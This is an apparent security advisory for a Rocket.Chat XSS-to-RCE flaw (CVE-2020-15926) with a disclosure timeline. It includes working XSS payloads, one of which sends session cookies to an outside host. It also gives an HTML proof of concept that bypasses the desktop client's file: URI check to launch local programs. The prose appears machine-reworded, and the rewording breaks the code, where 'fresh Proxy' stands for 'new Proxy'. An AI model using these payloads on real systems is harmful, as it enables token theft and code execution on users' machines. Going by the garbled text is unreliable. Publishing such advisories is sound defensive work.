Product description
Rocket.Chat [https://rocket.chat] is an open origin multiplatform messaging application akin to Slack. It is available as a self-hosted solution or in a SaaS model. Rocket.Chat can be utilized via a web browser, iOS, Android or utilizing Electron based clients available for Windows, Linux and MacOS.
Affected software
The following application versions are vulnerable:
Rocket.Chat <= 3.4.2 (verified on 3.4.0 and 3.4.2) [https://github.com/RocketChat/Rocket.Chat/releases/tag/3.4.2].
The vulnerability could be exploited in web and desktop clients. Mobile clients were not affected by this issue.
Vulnerability description
A malicious user can send a specially crafted message either to a channel or in a direct message to another user which will consequence in executing JavaScript in the victim's browser or inside the desktop client erstwhile the victim will usage the “Reply in Thread” functionality. In the case of desktop clients cross-site scripting (XSS) vulnerability leads to a distant code execution (RCE). CVE-2020-15926 was assigned to this issue.
Details and Exploitation
This section is divided into 2 parts, first 1 demonstrates the XSS issue itself and the second shows how the vulnerability can be utilized to accomplish distant code execution on a Electron based desktop client.
Cross-Site Scripting
In order to reproduce the issue a user has to post a beautiful standard XSS payload either to a channel or send a direct message:
<img src=x onerror=alert(document.domain)>
In order to trigger the XSS the victim has to start a thread:
and the payload gets executed:
More applicable payload stealing user’s token can look like this:
<img src=x onerror='new Image().src="https://overflow.pl/xss_leak?" + document.cookie'>
Demo video: https://www.youtube.com/embed/z-33gCvy3mc
The above script works on both Rocket.Chat, web and desktop clients.
Remote Code Execution
For desktop clients we can exploit this issue even further to execute arbitrary code on the user’s machine. While investigating erstwhile issues with Rocket.Chat desktop clients we found the following study [https://hackerone.com/reports/276031] by Matt Austin which provided a method for bypassing the checks preventing us from beginning a file: URI by overloading Regexp.prototype.test utilizing a JavaScript Proxy object [https://github.com/RocketChat/Rocket.Chat.Electron/blob/d9e3bc2d313a3eb84e644249c9cd029b12e482bb/src/preload/links.js]. The only thing that needed to be adjusted in the code was the way to the application we wanted to run:
<!--
file: check bypass code by Matt Austin from https://hackerone.com/reports/276031
-->
<!DOCTYPE html>
<html>
<head>
<script>
RegExp.prototype.test = fresh Proxy(RegExp.prototype.test, {
apply: function(target, thisArg, argumentsList) {
if((thisArg.source == '^file:\\/\\/.+') && (argumentsList[0] === 'file:///System/Applications/Calculator.app/')){
return false;
}
return Reflect.apply(target, thisArg, argumentsList)
}
});
setTimeout(()=>{
a = document.createElement("a")
a.href="file:///System/Applications/Calculator.app/"
document.body.appendChild(a)
a.click()
}, 3000);
</script>
</head>
<body>
<h1>Rocket.Chat XSS to RCE PoC</h1>
</body>
</html>
After the RCE payload has been prepared now it’s time to trigger the XSS in the Rocket.Chat e.g. by utilizing the following inject:
<img src=x onerror="location='https://overflow.pl/rocket/ele.html'">
Demo video: https://www.youtube.com/embed/9-6ETw72u34
Timeline
- 02/07/2020 – Issue has been discovered and reported to Rocket.Chat (version 3.4.0 / 2.7.9).
- 02/07/2020 – study has been acknowledged, more details requested.
- 03/07/2020 – Provided more details and demonstrated escalating the issue to RCE on desktop clients.
- 08/07/2020 – position update requested.
- 08/07/2020 – Rocket.Chat replied they request more time to verify the issue.
- 17/07/2020 – Sent an update that the issue is inactive reproducible in the latest version (3.4.2 / 2.7.10).
- 21/07/2020 – position update requested.
- 22/07/2020 – Rocket.Chat replied that they managed to reproduce the issue and are working on it.
- 23/07/2020 – Fix has been pushed to the Rocket.Chat repo [https://github.com/RocketChat/Rocket.Chat/pull/18356/files]
- 24/07/2020 – CVE-2020-15926 has been assigned to this vulnerability
- 28/07/2020 – Rocket.Chat 3.5.0 released that fixed the issue* [https://github.com/RocketChat/Rocket.Chat/releases/tag/3.5.0]
- 29/07/2020 - confirmed the fix and informed about the intention and date of publishing information about the vulnerability
- 31/07/2020 - Rocket.Chat 3.4.3 released that included the fix* as well [https://github.com/RocketChat/Rocket.Chat/releases/tag/3.4.3]
- 02/08/2020 - Rocket.Chat informed about intention of releasing fixes for another supported versions
- 05/08/2020 - Rocket.Chat confirmed that the fixes were rolled out in 3.5.0 and 3.4.3
- 18/08/2020 - This post has been published
* Rocket.Chat patches safety vulnerabilities as silent fixes, meaning the users / administrators may not be aware that the current version they are utilizing may have a critical safety flaw and should be updated as shortly as possible. We have raised our concerns regarding that policy to the Rocket.Chat squad which informed us they are working on improving the process of informing about safety vulnerabilities.